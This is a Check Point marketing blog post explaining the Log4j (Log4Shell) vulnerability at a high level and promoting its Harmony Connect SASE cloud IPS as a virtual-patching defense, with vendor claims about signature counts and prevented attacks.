How SASE protects from Log4j

By Mor Ahuvia, Product Marketing Manager and Bob Bent, Partner Solutions Engineer

LOG4J lessons – How SASE protects from 0-day exploits

Log4J shows why the quality of threat prevention is so important in a SASE solution.

In the case of Apache Log4J vulnerability, Check Point Harmony Connect (SASE) customers had an IPS protection within hours of the vulnerabilities’ disclosure. This means that even if SASE customers did not have time to patch their servers or update their applications, they were still protected by the automatic and real-time IPS signature updates in Harmony Connect SASE. No manual patch management is required.

Be prepared. Download the ESG Guide to SASE network security.

Log4J vulnerability in a nutshell

When rating a vulnerability, a severity score is assigned based upon factors such as the attack vector (network vs. physical access), attack complexity (simple vs. complex), whether user interaction is required or not, and if the attack requires privileged access. Impact of the attack is also considered. This includes the scope of the number of vulnerable systems (one system vs. many). Can you guess where Log4J ranks on the severity scale, where a low score is 1 and a high score is 10?

While several Log4J related issues were recently uncovered, the most severe one, officially named Apache Log4j Remote Code Execution (CVE-2021-44228) earned a CVE severity score of 10.0 (out of 10.0!). The exploit of this vulnerability has been dubbed Log4Shell, and enables an attacker to run malicious code on a user directory (using the LDAP protocol) by giving it instructions to retrieve a malicious object from a malicious website. The exploit can be performed on any server, application or client that runs a vulnerable version of the Log4J logging framework used in Java applications.

Unfortunately, Apache Log4j is the most popular java logging library with over 400,000 downloads from its GitHub project. And while not all of them process input, log their input, or necessarily use log4J for logging, that number still provides a clue to the order of magnitude we are dealing with. For an excellent summary of how Log4J attacks work, read Check Point Research’s Laconic Log4J FAQ.

The power of virtual patching in preventing zero day attacks

When time is of the essence, the ability to protect yourself against the newest zero-day vulnerabilities (CVEs) through virtual patching becomes critical.

An intrusion prevention system (IPS) works by virtually patching against known vulnerabilities in browsers, applications and systems (including communication protocols uses by these systems). Every time a security hole is disclosed, IPS and security vendors keep their customers protected by adding an IPS signature to address it—an IPS signature which may be based on a patch issued by a software vendor, volunteer open source developers, or even a security vendor’s own proprietary workaround.

Given their impact on live production systems, manually patching 100s or 1000s of servers can take days, weeks or even months. That is, if a patch is available in the first place. Not all vendors have patched their vulnerable Log4J products. This makes virtual patching a more practical and centralized method to mitigate new security risks and prevent the exploitation of these security holes. Case in point, since Check Point has implemented its Log4J IPS protections, over 4,300,000 attempts to exploit the vulnerability have been prevented, affecting 48% of corporate networks worldwide.

The value of a cloud IPS in a SASE solution

A cloud-based intrusion prevention system (IPS) service, offered as part of a SASE solution such as Harmony Connect, means ALL of your potentially-vulnerable applications and users are protected within the shortest possible amount of time, EVEN IF your IT and security teams have not had time to patch all your servers, apps and agents.

By offloading patch management to a cloud IPS, not only can your organization stay out of the headlines, but your security team can also sleep better at night, knowing that through virtual patching, potentially vulnerable assets are protected.

In fact, shortly after the Log4j vulnerability was reported, all relevant protections were propagated through all of Check Point products. SASE customers that enabled automated security updates, could enjoy this extra protection as soon as it was added (refer to sk176884).

Check Point’s industry-leading IPS contains over 11,000 signatures that protect against IT and IoT vulnerabilities, including 25 out of NSA’s top 25 vulnerabilities exploited in the wild. Furthermore, a sense of urgency is in our DNA: We are proud to lead with the shortest time to virtually patch against new exploits, whenever they are discovered, day or night, weekday or weekend.

Finally, we’re happy to share that Check Point did not have product or systems impacted by the vulnerability. We also stand out in the industry in this respect.

Keeping up with new variants via ThreatCloud

To keep up with the latest malware variants exploiting Log4J, Check Point products leverage ThreatCloud, which provides real-time threat intelligence derived from hundreds of millions of sensors worldwide in networks, endpoints and mobile devices. The brain behind our prevention prowess, ThreatCloud merges big data threat intelligence with advanced AI technologies to provide accurate prevention to all Check Point Software customers, with no false positives.

Stay Safe with Harmony Connect SASE

While unpleasant surprises are a given in the world of cyber security, a cloud-based IPS means ALL your applications and users can be protected within the shortest possible amount of time.

Check Point Harmony Connect offers a SASE approach to network security, making it easier for IT and security teams to protect remote users and branch offices, without compromising on security or speed.

To learn more, we invite you to check out these resources: